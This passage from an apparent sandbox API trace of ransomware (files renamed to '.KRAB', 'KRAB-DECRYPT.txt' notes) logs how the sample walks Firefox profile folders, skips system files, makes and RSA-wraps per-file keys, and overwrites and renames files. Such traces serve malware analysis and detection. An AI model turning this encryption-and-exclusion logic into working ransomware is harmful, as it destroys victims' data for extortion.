DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0078.731] WriteFile (in: hFile=0x720, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0078.732] CloseHandle (hObject=0x720) returned 1 [0078.733] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.733] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.733] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x19, wMilliseconds=0x3aa)) [0078.733] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.734] GetWindowsDirectoryW (in: lpBuffer=0x3010000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0078.734] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3010200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3010600, lpMaximumComponentLength=0x3010608, lpFileSystemFlags=0x3010604, lpFileSystemNameBuffer=0x3010400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3010600*=0xd2ca4def, lpMaximumComponentLength=0x3010608*=0xff, lpFileSystemFlags=0x3010604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0078.734] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a08d2ca4dee3d.lock") returned 118 [0078.734] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\events\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x720 [0078.735] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.735] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.735] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\") returned 95 [0078.736] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*" [0078.736] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0xffe498 [0078.736] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.736] FindNextFileW (in: hFindFile=0xffe498, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0078.736] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.736] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.736] FindNextFileW (in: hFindFile=0xffe498, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0078.736] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0078.736] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0078.736] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a08d2ca4dee3d.lock" [0078.736] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.736] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 123 [0078.736] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\d2ca4a08d2ca4dee3d.lock") returned 118 [0078.737] lstrlenW (lpString=".lock") returned 5 [0078.737] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.737] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".lock ") returned 6 [0078.737] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.737] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.738] FindNextFileW (in: hFindFile=0xffe498, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0078.738] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0078.738] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0078.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\KRAB-DECRYPT.txt" [0078.738] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.738] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\KRAB-DECRYPT.txt.KRAB") returned 116 [0078.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\KRAB-DECRYPT.txt") returned 111 [0078.738] lstrlenW (lpString=".txt") returned 4 [0078.738] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.738] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".txt ") returned 5 [0078.738] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\KRAB-DECRYPT.txt") returned 111 [0078.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\events\\KRAB-DECRYPT.txt") returned 111 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0078.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0078.739] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.740] FindNextFileW (in: hFindFile=0xffe498, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0078.740] FindClose (in: hFindFile=0xffe498 | out: hFindFile=0xffe498) returned 1 [0078.740] CloseHandle (hObject=0x720) returned 1 [0078.740] FindNextFileW (in: hFindFile=0xffe958, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0078.740] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0078.740] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0078.740] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\KRAB-DECRYPT.txt" [0078.740] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.741] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\KRAB-DECRYPT.txt.KRAB") returned 109 [0078.741] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\KRAB-DECRYPT.txt") returned 104 [0078.741] lstrlenW (lpString=".txt") returned 4 [0078.741] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.741] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".txt ") returned 5 [0078.741] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.741] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\KRAB-DECRYPT.txt") returned 104 [0078.742] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\KRAB-DECRYPT.txt") returned 104 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0078.742] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0078.742] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.742] FindNextFileW (in: hFindFile=0xffe958, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0078.742] lstrcmpW (lpString1="store.json.mozlz4", lpString2=".") returned 1 [0078.742] lstrcmpW (lpString1="store.json.mozlz4", lpString2="..") returned 1 [0078.742] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\", lpString2="store.json.mozlz4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4" [0078.742] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.743] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4.KRAB") returned 110 [0078.743] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned 105 [0078.743] lstrlenW (lpString=".mozlz4") returned 7 [0078.743] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.743] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".mozlz4 ") returned 8 [0078.743] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.744] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned 105 [0078.744] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4") returned 105 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="desktop.ini") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="autorun.inf") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="ntuser.dat") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="iconcache.db") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="bootsect.bak") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="boot.ini") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="ntuser.dat.log") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="thumbs.db") returned -1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="KRAB-DECRYPT.html") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="ntldr") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="NTDETECT.COM") returned 1 [0078.744] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="Bootfont.bin") returned 1 [0078.744] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.744] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x1011700) returned 1 [0078.746] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.746] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.747] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.747] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338e2cc | out: pbBuffer=0x338e2cc) returned 1 [0078.747] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0078.747] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.747] CryptAcquireContextW (in: phProv=0x338e234, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e234*=0x1010820) returned 1 [0078.749] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0078.749] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0078.750] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0078.750] CryptGenRandom (in: hProv=0x1010820, dwLen=0x8, pbBuffer=0x338e2ec | out: pbBuffer=0x338e2ec) returned 1 [0078.750] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0078.750] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.750] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x1011898) returned 1 [0078.752] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0xffe498) returned 1 [0078.752] CryptGetKeyParam (in: hKey=0xffe498, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0078.752] CryptEncrypt (in: hKey=0xffe498, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338e25c*=0x100) returned 1 [0078.752] GetLastError () returned 0x0 [0078.752] CryptDestroyKey (hKey=0xffe498) returned 1 [0078.752] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0078.752] CryptAcquireContextW (in: phProv=0x338e22c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e22c*=0x10113d0) returned 1 [0078.754] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e230 | out: phKey=0x338e230*=0xffe6d8) returned 1 [0078.754] CryptGetKeyParam (in: hKey=0xffe6d8, dwParam=0x8, pbData=0x338e224, pdwDataLen=0x338e228, dwFlags=0x0 | out: pbData=0x338e224*=0x800, pdwDataLen=0x338e228*=0x4) returned 1 [0078.754] CryptEncrypt (in: hKey=0xffe6d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338e25c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338e25c*=0x100) returned 1 [0078.754] GetLastError () returned 0x0 [0078.754] CryptDestroyKey (hKey=0xffe6d8) returned 1 [0078.754] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0078.754] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\store.json.mozlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x720 [0078.755] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0078.756] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0078.756] ReadFile (in: hFile=0x720, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e2fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e2fc*=0x42, lpOverlapped=0x0) returned 1 [0078.810] SetFilePointerEx (in: hFile=0x720, liDistanceToMove=0xffffffbe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.810] WriteFile (in: hFile=0x720, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e2f8*=0x42, lpOverlapped=0x0) returned 1 [0078.811] WriteFile (in: hFile=0x720, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e2f8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338e2f8*=0x208, lpOverlapped=0x0) returned 1 [0078.811] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.815] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.815] CloseHandle (hObject=0x720) returned 1 [0078.816] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.816] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\store.json.mozlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\crashes\\store.json.mozlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\crashes\\store.json.mozlz4.krab")) returned 1 [0078.820] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.820] FindNextFileW (in: hFindFile=0xffe958, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0078.820] FindClose (in: hFindFile=0xffe958 | out: hFindFile=0xffe958) returned 1 [0078.821] CloseHandle (hObject=0x7ec) returned 1 [0078.821] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0078.821] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0078.821] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0078.821] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a08d2ca4dee3d.lock" [0078.821] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.821] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 108 [0078.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a08d2ca4dee3d.lock") returned 103 [0078.822] lstrlenW (lpString=".lock") returned 5 [0078.822] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0078.822] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".lock ") returned 6 [0078.822] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.822] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.823] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0078.823] lstrcmpW (lpString1="datareporting", lpString2=".") returned 1 [0078.823] lstrcmpW (lpString1="datareporting", lpString2="..") returned 1 [0078.823] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="datareporting" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting" [0078.823] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\" [0078.823] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0078.823] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0078.823] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0078.823] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0078.823] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0078.823] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.824] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0078.824] wsprintfW 